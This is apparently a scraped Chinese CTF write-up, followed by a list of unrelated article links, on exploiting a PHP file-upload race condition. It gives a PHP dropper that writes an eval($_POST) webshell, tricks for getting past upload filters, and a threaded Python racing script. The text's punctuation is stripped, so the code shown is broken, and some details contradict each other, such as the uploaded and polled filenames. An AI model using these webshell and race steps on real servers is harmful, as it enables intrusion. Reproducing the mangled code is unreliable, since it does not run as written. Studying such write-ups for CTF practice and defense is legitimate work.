当前位置：首页 > article >正文

Buuctf N1BOOK [第二章 web进阶]文件上传：从源码泄露到条件竞争漏洞的实战利用

article 2026/4/17 16:04:55

1. 源码泄露与文件上传逻辑分析打开题目页面首先注意到页面底部直接暴露了PHP源代码。这种源码泄露在CTF比赛中很常见通常意味着出题人故意留给我们分析漏洞的线索。仔细阅读代码会发现几个关键点文件上传功能使用标准的PHP$_FILES处理流程上传目录采用upload/随机值/的结构随机值通过md5(time().rand(1000,9999))生成文件类型限制为zip、jpg、gif、png四种格式每5分钟会清理一次上传目录中的非图片文件特别值得注意的是move_uploaded_file函数的调用方式。它会把文件保存到临时目录而非直接放在upload目录下这为后续的条件竞争利用埋下了伏笔。我在测试时发现虽然前端提示上传成功但实际访问文件总是失败就是因为这个临时目录机制在作祟。2. 条件竞争漏洞原理剖析条件竞争Race Condition本质上是由于程序在多线程/多进程环境下对共享资源的操作顺序不可控导致的漏洞。在这个题目中具体表现为文件上传后会先保存在临时目录系统会检查文件类型并删除非法文件但检查和删除操作之间存在时间差通过Burp Suite的Intruder模块我们可以同时发起大量上传请求和访问请求。当某个上传的PHP文件在被删除前被访问到就能成功执行其中的代码。我在实际测试中发现大约每50次尝试能成功1-2次成功率取决于服务器性能。3. 实战攻击链构建3.1 恶意文件构造首先准备一个特殊的PHP文件1.php内容如下?php fputs(fopen(../shell.php,w),?php eval($_POST[a])?); ?这个脚本的作用是在上级目录生成一个webshell文件。注意这里使用相对路径../是为了突破临时目录的限制。3.2 文件上传绕过技巧虽然系统限制上传类型但可以通过以下方法绕过修改文件后缀为1.php.jpg使用Burp修改Content-Type为image/jpeg利用Apache解析漏洞最终文件名构造为1.php.zzz我测试发现使用%00截断的方法在这个环境不适用因为PHP版本较高已经修复此漏洞。3.3 自动化攻击脚本为了提高成功率我编写了Python自动化脚本import requests import threading url http://target.com/upload.php def upload(): files {file: (1.php.jpg, open(1.php,rb), image/jpeg)} requests.post(url, filesfiles) def access(): while True: r requests.get(http://target.com/upload/1.php) if r.status_code 200: print(Success!) break for i in range(20): t1 threading.Thread(targetupload) t2 threading.Thread(targetaccess) t1.start() t2.start()这个脚本会同时启动20个上传线程和20个访问线程大大提高了攻击成功率。4. 防御方案与思考从防御角度可以采取以下措施使用文件内容检测而非扩展名判断对上传文件进行重命名避免目录遍历设置文件权限为不可执行使用同步锁机制处理文件操作在实际渗透测试中遇到类似的文件上传功能时我通常会先检查是否存在源码泄露然后分析文件处理逻辑中的时间窗口。有时候看似严密的防御可能就因为几毫秒的时间差而功亏一篑。

Buuctf N1BOOK [第二章 web进阶]文件上传：从源码泄露到条件竞争漏洞的实战利用

相关文章：

Buuctf N1BOOK [第二章 web进阶]文件上传：从源码泄露到条件竞争漏洞的实战利用

PyTorch迁移学习翻车实录：修改SqueezeNet分类头时遇到的‘RuntimeError’及完整修复方案

别再让用户干等了！Spring Boot + SSE 手把手实现大模型流式对话（附完整前后端代码）

语音模块避坑指南：从命令词表到固件升级的9个关键步骤

你的Mask数据集规范吗？Labelme标注避坑指南与质量检查脚本分享

C++入门指南：从基础语法到核心特性全解析

AI API 调不通怎么办？延迟高、被限流、鉴权报错的 3 种解决方案实测

从MATLAB到Tecplot：手把手教你搞定复杂非结构网格（含FEPolygon/FEPolyhedron）的数据转换

避坑指南：Cadence网表导入PCB时的7个关键检查点（以PMU6050封装为例）

应对MathWorks合规审查的专项准备工作

从原型到量产：基于RK3326PX30的嵌入式Android/Linux双系统开发实战指南

从外卖配送轨迹到共享单车路径：详解uniapp中高德地图Polyline的三种实战用法

告别SMARTFORMS打印乱码和行重叠：手把手教你配置动态文本的段落格式

表格这玩意儿，是怎么越搞越复杂的

从N3到0.25μm：解码台积电制程工艺的演进图谱与商业密码

庖丁解牛：从BootROM到FSBL的ZYNQ启动全景解析

用ShaderGraph的Unlit节点，5分钟搞定一个赛博朋克霓虹灯特效

MMU内存管理单元和volatile

Topit：Mac窗口置顶终极解决方案，快速提升多任务处理效率

从SiamFC到SiamMask：用PySOT工具包复现孪生网络跟踪算法的保姆级教程

选择排序：简单高效的排序入门

一键克隆开发环境，告别配置地狱

开关柜局放选型全维度解析：技术机理、标准解读与实战策略

Pycharm 与 Jupyter 的深度集成：从环境搭建到高效数据分析实战

Harness内心OS：大模型只管想，剩下烂摊子全我的

Open WebUI 企业级AI平台实战指南：从零部署到生产环境优化

PCB设计效率翻倍！AD软件中切换层与单层模式的5个实用技巧

Linux个人心得26 （redis主从复制全流程，详细版）

别再只盯着编译结果了！手把手教你用Keil MDK的map文件，精准排查STM32内存溢出和代码膨胀

logrotate实战避坑与高级配置指南